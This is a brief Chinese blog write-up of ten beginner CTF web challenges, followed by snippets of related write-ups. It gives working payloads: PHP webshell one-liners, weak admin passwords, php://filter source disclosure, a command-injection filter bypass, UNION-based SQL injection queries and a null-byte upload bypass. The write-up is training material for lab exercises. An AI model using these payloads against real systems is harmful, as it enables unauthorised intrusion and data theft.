Web10道签到题

最新推荐文章于 2024-03-18 19:26:17 发布
最新推荐文章于 2024-03-18 19:26:17 发布
阅读量163 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39788411/article/details/133053976
版权

题目1

image
万能密码

题目2

弱口令 admin 123456登录后台,文件管理上传<?php system('cat /tmp/flag');?>imageimage

题目3

image

题目4

F12发现include.phpinclude.php?file=php://filter/read=convert.base64-encode/resource=include.php
查看文件源码,发现upload.php
上传图片马image
include.php包含一下image

题目5

?rce=ca\t%09/tmp/flag

题目6

查表名?id=-1 union select 1,2,group_concat(table_name)from(information_schema.tables)where(table_schema=database())image
查flag表的列名?id=-1 union select 1,2,group_concat(column_name)from(information_schema.columns)where(table_schema=database())and(table_name='flag')image
查flaghttp://122.114.225.41:20126/?id=-1%20union%20select%201,2,(flag)from(flag)image

题目7

image
做个图片马,1.png%00.phpimage

题目8

image

题目9

admin 123456登录后台 admin/upload.php上传一个一句话马image
然后
上传图片管理那里右键查看路径image

题目10

image

V3g3t4ble
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow-WEB-web1签到
weixin_45653478的博客
03-12 272
页面中只有一句 where is flag?,我们按F12(或者Fn+F12)进入开发者模式,查看页面的源代码。flag为:ctfshow{2f6f30f7-06f9-4f61-b066-1ceeb11e8c36}Ctrl+c将源码中的注释复制下来,很明显是加密后的内容,需要进行解密,从而获取flag。复制注释符中间的内容,到。
CTFshow 每日一练
m0_73867210的博客
01-02 525
一、web签到 打开链接 查看源码 利用base64解码得到flag 二、web2 看到有提示--SQL注入 先试着使用万能密码登陆 发现有回显,直接sql注入 ' or 1=1 order by 3# 发现到4时不回显 开始爆库名,看看哪个位置会回显 ' or 1=1 union select 1,2,3# ' or 1=1 union select 1,database(),3# 得到库名:web2,爆表名 ' or 1
CTF show----web笔记(web签到~web6)
weixin_45908624的博客
11-22 3769
web签到~web6 解笔记
ctfshow菜狗杯-web签到 详细解过程
a_153161的博客
01-19 1068
ctfshow 菜狗杯web签到详细解体过程
ctfshow web
m0_73239569的博客
03-04 849
记录刷
LCTF#LCTF2017#web签到1
07-25
web签到目不难, 一共就只有几个点用file协议读取本地文件截断url后面拼接的/, GET请求, 用?#都可以payload其实很简单: file://
SICTF 2023 真
09-10
10. **W1-[签到]Include**:与C1类似,可能是Web安全领域的一个签到目,"Include"可能与服务器端的文件包含漏洞有关。 通过对这些文件名的分析,我们可以看出SICTF 2023的挑战涵盖了Web安全、密码学、逆向工程、...
课程管理系统(人脸识别+扫码签到
06-13
闲暇时和舍友接的老师的一个课,Java web项目,基于Java的课堂管理系统,分为教师端和学生端以及管理员端,包含消息系统(websocket实现),博客系统(富文本编译器,支持表情照片等基本功能),操作日志(Spring ...
java_jsp项目源码_通用的在线考试系统(+struts+hibernate+oracle)130220.rar
最新发布
03-28
管理员可以设置试卷的总分、时间限制、目顺序等参数,以及对每目的分值和难度进行调整。同时,系统提供了试卷预览和打印功能,方便教师和学生进行考试前的准备。 4. 在线考试:系统支持实时监控考试过程,...
H5小游戏-汉字找不同.html
12-19
H5小游戏:汉字找不同vue+html5
2022级云曦实验室考试(一)web
lulu001128的博客
03-08 638
解决过程
2024腾龙杯web签到-初识jwt(签到:这是一个登录页面)
Welcome To Myon'Blog !
03-18 742
它是 JSON Web Token 的缩写,是一个开放标准,定义了一种紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息,该信息可以被验证和信任,因为它是数字签名的。它就是一种认证机制,让后台知该请求是来自于受信的客户端。jwt 由三部分组成,它们之间用圆点(.)连接,这三部分分别是:Header、Payload、Signature。回到最初请求的 login , post 传入 json 格式的 tooken。回显得到一个 token ,也是 json 的格式。
青少年CTF平台 Web签到
zxsctf的博客
10-09 3962
Web一星简单Web签到。直接启动环境,等待30秒左右访问目链接。
菜狗杯Web签到wp
Altering_Ji的博客
11-17 3202
菜狗杯web签到wp
web基本解思路
Ljt101222的博客
07-19 3709
前两天安装一些web相关的软件,今天主要是做一些简单的web基础。主要用BurpSuite软件进行抓包和分析数据,其中涉及到一些方法,如下所示:   一、爆破,包括包括md5、爆破随机数、验证码识别等 二、绕WAF,包括花式绕Mysql、绕文件读取关键词检测之类拦截 三、花式玩弄几个PHP特性,包括弱类型,strpos和===,反序列化 destruct、\0截断、iconv截断、 四、密码...
ctfshow—web签到
HAI_WD的博客
07-24 408
通常这种目都是在F12中的。base64解一下就得到答案。首先看到的是下图所示的内容。
{青少年CTF} Web签到 详解
lfc18950509270的博客
07-26 1153
又是除了几个字外一片空白,可能有的同学照例打开源代码看了起来,但是什么也没发现。这时候,我们可能就需要看一下它的目录下有没有什么文件里藏着flag。可以发现,扫描出目录下存在一个加index.php.bak的文件,直接复制到浏览器中,下载得到它,直接打开即可发现flag。至于它的安装和使用方法你们可以自己搜一下,或者你们需要在找个时间单独写一篇。这边使用的命令是dirsearch -u ,u指的就是url的意思。这样我们又有了一种思路可以拿到flag了,虽然也比较简单。进入之后可以看到是长这样的。
ctfshow-WEB-web3
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块的第3关是一个文件包含漏洞,include()函数包含的文件会被执行,我们使用PHP伪协议配合抓包工具进行命令执行,从而获取flag 这一关的flag就存放在网站跟路径下的文件中 php://input可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效 页面中显示了部分源码,明显是引导我们利用文件包含漏洞进行操作,源码中的inc...
ctfshow web签到
09-12
ctfshow-web中的"web签到"是其中的一目。具体信息如下: 请注意,网站的内容中包含了一个URL:/?url=data://text/plain,<?php system("cat ctf_go_go_go"); ?> 。这个URL可能与web签到有关。 此外,网站中还包含了一个meta标签:<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> 。这个标签指定了网页的字符编码格式。 综上所述,您可以尝试访问ctfshow-web,并查找与web签到相关的内容。您可以注意URL和meta标签中的信息,这可能有助于解决这目。祝您好运!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值